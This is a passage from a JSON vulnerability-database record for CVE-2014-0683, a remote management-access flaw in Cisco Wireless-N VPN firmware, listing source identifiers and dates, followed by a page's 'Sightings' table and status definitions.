"id": "CNVD-2014-01575"
},
{
"date": "2014-03-06T00:00:00",
"db": "VULHUB",
"id": "VHN-68176"
},
{
"date": "2014-03-05T00:00:00",
"db": "BID",
"id": "65988"
},
{
"date": "2014-03-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001579"
},
{
"date": "2018-12-14T18:00:57",
"db": "PACKETSTORM",
"id": "150781"
},
{
"date": "2014-01-26T04:44:44",
"db": "PACKETSTORM",
"id": "124954"
},
{
"date": "2014-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201403-132"
},
{
"date": "2014-03-06T11:55:05.287000",
"db": "NVD",
"id": "CVE-2014-0683"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01575"
},
{
"date": "2018-12-15T00:00:00",
"db": "VULHUB",
"id": "VHN-68176"
},
{
"date": "2014-03-05T00:00:00",
"db": "BID",
"id": "65988"
},
{
"date": "2014-03-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001579"
},
{
"date": "2014-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201403-132"
},
{
"date": "2024-11-21T02:02:39.287000",
"db": "NVD",
"id": "CVE-2014-0683"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201403-132"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Wireless-N VPN Vulnerabilities that can gain management access in product firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001579"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201403-132"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.